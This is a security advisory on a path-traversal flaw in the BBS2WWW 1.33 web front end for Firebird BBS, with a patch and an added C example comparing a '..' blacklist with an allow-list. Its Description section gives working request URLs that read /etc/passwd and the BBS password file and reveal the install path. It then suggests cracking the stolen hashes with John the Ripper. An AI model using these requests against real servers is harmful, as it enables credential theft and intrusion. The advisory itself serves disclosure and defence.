Author: Sinbad
Web: http://sinbad.dhs.org
Introduction
------------
BBS2WWW is a WWW front end for Firebird BBS developed by the Shanghai Jiaotong University Computer Application Studio (http://cas.tsx.org/). It lets users reach every function of the BBS without logging in over telnet.
The CGI library in BBS2WWW 1.33 has a flaw: when certain variables in a submitted link contain the string "../", a remote user can read the contents of any file the Web server account can read, and can also browse any directory that account has access to.
In addition, if a user alters the variable so that it names a file that does not exist, the error message discloses the physical path of the BBS system on disk.
Description
-----------
1. Disclosure of the BBS system's physical path
http://bbs.victim.edu.cn/cgi-bin/bbscon?board=sysop&file=M.971439268
returns an error that echoes the absolute path:
Error in opening file /home1/hhfeng/bbs/home/boards/sysop/M.971439268
2. Reading system files
http://bbs.victim.edu.cn/cgi-bin/bbscon?board=sysop&file=../../../../../../etc/passwd
http://bbs.victim.edu.cn/cgi-bin/bbscon?board=sysop&file=../../../../../../home1/hhfeng/bbs/home/.PASSWDS
The .PASSWDS file holds the BBS users' account names, passwords and other information; once downloaded, the password hashes can be brute-forced with John the Ripper.
Solutions
---------
In the part of the CGI library that splits Name/Value pairs, add the following:
    /* reject ".." in every value except the three free-text fields */
    if (strstr (cgi_entries[i].value, "..") != NULL
        && strstr (cgi_entries[i].name, "passwd") == NULL
        && strstr (cgi_entries[i].name, "title") == NULL
        && strstr (cgi_entries[i].name, "text") == NULL)
        show_error ("Error input!");
That is, every input except the user password, the article title and the article body must be filtered for the ".." string. The check must run on the decoded value (after %XX sequences have been translated), and the three exempted fields must never be used to build a file path. This patch also does not remove the absolute path from the error message in point 1; that message should be changed so it no longer echoes the path.
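The following is an added example and not code from BBS2WWW or its authors. It models how a CGI such as bbscon splices board= and file= into a path below the BBS home directory, applies the ".." blacklist given above both to a raw and to a URL-decoded value, and contrasts it with a per-component allow-list. BBS_HOME, the function names and the constructed inputs are assumptions; only the path and the URLs come from the advisory.

```c
/*
 * Added example, not code from BBS2WWW: a minimal model of how a CGI such as
 * bbscon maps ?board=...&file=... onto a path below the BBS home directory,
 * the ".." blacklist proposed in the advisory, and a stricter per-component
 * allow-list. BBS_HOME and every function name are assumptions.
 */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed BBS home; the advisory's error message shows this path on one site. */
#define BBS_HOME "/home1/hhfeng/bbs/home"

/* Decode %XX and '+' in place, as a CGI library does when splitting
 * name/value pairs. Returns the decoded length. */
static size_t url_decode(char *s)
{
    char *r = s, *w = s;
    while (*r) {
        if (*r == '%' && isxdigit((unsigned char)r[1]) &&
            isxdigit((unsigned char)r[2])) {
            char hex[3] = { r[1], r[2], 0 };
            *w++ = (char)strtol(hex, NULL, 16);
            r += 3;
        } else if (*r == '+') {
            *w++ = ' ';
            r++;
        } else {
            *w++ = *r++;
        }
    }
    *w = 0;
    return (size_t)(w - s);
}

/* Behaviour described for 1.33: board and file are spliced into the path
 * unchecked, so "../" in either parameter walks out of boards/. */
static int build_path_unsafe(const char *board, const char *file,
                             char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "%s/boards/%s/%s", BBS_HOME, board, file);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* The advisory's fix: reject ".." in every CGI value except the three
 * free-text fields. Returns 1 if the value is acceptable. */
static int cgi_value_ok(const char *name, const char *value)
{
    if (strstr(value, "..") == NULL)
        return 1;
    return strstr(name, "passwd") != NULL || strstr(name, "title") != NULL ||
           strstr(name, "text") != NULL;
}

/* Same check applied the way the CGI library sees the data: after decoding.
 * A check on the raw query string misses "%2e%2e/". */
static int decoded_value_ok(const char *name, const char *raw)
{
    char buf[1024];
    if (strlen(raw) >= sizeof buf)
        return 0;
    strcpy(buf, raw);
    url_decode(buf);
    return cgi_value_ok(name, buf);
}

/* Stricter alternative: one path component, [A-Za-z0-9._-] only, non-empty,
 * and neither "." nor "..". A '/' or an absolute path is refused outright. */
static int safe_component(const char *s)
{
    size_t i;
    if (s == NULL || *s == 0 || strcmp(s, ".") == 0 || strcmp(s, "..") == 0)
        return 0;
    for (i = 0; s[i]; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-'))
            return 0;
    }
    return 1;
}

static int build_path_safe(const char *board, const char *file,
                           char *out, size_t outlen)
{
    if (!safe_component(board) || !safe_component(file))
        return -1;
    return build_path_unsafe(board, file, out, outlen);
}

int main(void)
{
    /* Constructed inputs modelled on the advisory's URLs. */
    const char *traversal = "../../../../../../etc/passwd";
    const char *encoded = "%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd";
    char path[512];

    build_path_unsafe("sysop", traversal, path, sizeof path);
    printf("1.33 would open:    %s\n", path);
    printf("blacklist, raw:     %s\n", cgi_value_ok("file", encoded) ? "passes" : "rejected");
    printf("blacklist, decoded: %s\n", decoded_value_ok("file", encoded) ? "passes" : "rejected");
    printf("allow-list, M.971439268: %s\n",
           build_path_safe("sysop", "M.971439268", path, sizeof path) == 0 ? path : "rejected");
    printf("allow-list, traversal:   %s\n",
           build_path_safe("sysop", traversal, path, sizeof path) == 0 ? path : "rejected");
    return 0;
}
```

The raw-versus-decoded pair shows why the advisory places the check in the Name/Value splitting code: a "%2e%2e/" sequence contains no literal ".." until it is decoded. The allow-list needs no exemptions because it is applied only to the two values that actually become path components, which is the simpler invariant to keep as the CGI grows.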
Many universities in China still run BBS2WWW 1.33 or earlier; apply the fix as soon as possible or upgrade to version 1.34.